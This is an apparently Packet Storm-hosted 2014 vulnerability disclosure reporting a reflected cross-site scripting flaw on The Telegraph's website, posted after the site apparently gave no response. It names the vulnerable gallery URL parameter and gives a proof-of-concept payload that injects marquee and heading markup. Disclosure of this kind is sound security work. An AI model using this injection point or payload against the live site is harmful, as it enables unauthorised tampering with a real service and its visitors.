The Telegraph website suffers from a cross site scripting vulnerability. The author was unable to get a response from them and is releasing the details.
7fe11f83b988990c5f753c9d248f1814================================================================================
Cross Site Scripting on The Telegraph
================================================================================
# Site: www.telegraph.co.uk
# Date: 25/02/2014
# Author: s4r4d0
# Contact: s4r4d0[at]yahoo[dot]com
# Team: Fatal Error
# Twitter: @FatalErrorSec
# Made in Brazil
================================================================================
[~] PoC :
# Site: www.telegraph.co.uk
# File: /news/picturegalleries/3167583/Iconic-Dresses.html?image=
# XSS: ">><marquee><h1>XSS By Fatal Error</h1><marquee>
================================================================================
© 2016 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!